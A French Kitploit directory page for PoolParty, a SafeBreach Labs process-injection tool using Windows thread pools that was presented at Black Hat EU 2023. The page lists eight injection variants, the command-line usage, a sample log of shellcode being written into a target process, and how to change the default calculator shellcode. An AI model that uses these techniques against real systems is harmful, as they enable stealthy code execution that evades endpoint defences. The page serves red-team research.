Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoolParty — Un ensemble de techniques d'injection de processus totalement indétectables abusant des pools de threads Windows. | Kitploit
Outils/GitHubGitHub/safebreach-labs/poolparty
Escalade de PrivilègesExploitationShellcodePost-ExploitationRed TeamingDéveloppement de Charges Utiles
GitHubsafebreach-labs/poolparty

PoolParty

Un ensemble de techniques d'injection de processus totalement indétectables abusant des pools de threads Windows.

Voir le dépôt
1.3k179il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoolParty

Une collection de techniques d'injection de processus totalement indétectables exploitant les pools de threads Windows. Présenté lors des briefings Black Hat EU 2023 sous le titre - The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools

Variantes de PoolParty

ID de varianteDescription de la variante
1Écraser la routine de démarrage de la fabrique de workers cible
2Insérer un élément de travail TP_WORK dans le pool de threads du processus cible
3Insérer un élément de travail TP_WAIT dans le pool de threads du processus cible
4Insérer un élément de travail TP_IO dans le pool de threads du processus cible
5Insérer un élément de travail TP_ALPC dans le pool de threads du processus cible
6Insérer un élément de travail TP_JOB dans le pool de threads du processus cible
7Insérer un élément de travail TP_DIRECT dans le pool de threads du processus cible
8Insérer un élément de travail TP_TIMER dans le pool de threads du processus cible

Utilisation

root@kitploit:~
PoolParty.exe -V <ID DE VARIANTE> -P <PID CIBLE>

Exemples d'utilisation

Insérer un élément de travail TP_TIMER dans le processus ID 1234

root@kitploit:~
>> PoolParty.exe -V 8 -P 1234

[info]    Starting PoolParty attack against process id: 1234
[info]    Retrieved handle to the target process: 00000000000000B8
[info]    Hijacked worker factory handle from the target process: 0000000000000058
[info]    Hijacked timer queue handle from the target process: 0000000000000054
[info]    Allocated shellcode memory in the target process: 00000281DBEF0000
[info]    Written shellcode to the target process
[info]    Retrieved target worker factory basic information
[info]    Created TP_TIMER structure associated with the shellcode
[info]    Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info]    Written the specially crafted TP_TIMER structure to the target process
[info]    Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info]    Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info]    PoolParty attack completed successfully

Shellcode par défaut et personnalisation

Le shellcode par défaut lance une calculatrice via l'API WinExec.

Pour personnaliser l'exécutable à lancer, modifiez le chemin à la fin de la variable g_Shellcode présente dans le fichier main.cpp.

Auteur - Alon Leviev

  • LinkedIn - Alon Leviev
  • Twitter - @_0xDeku
Télécharger l’outil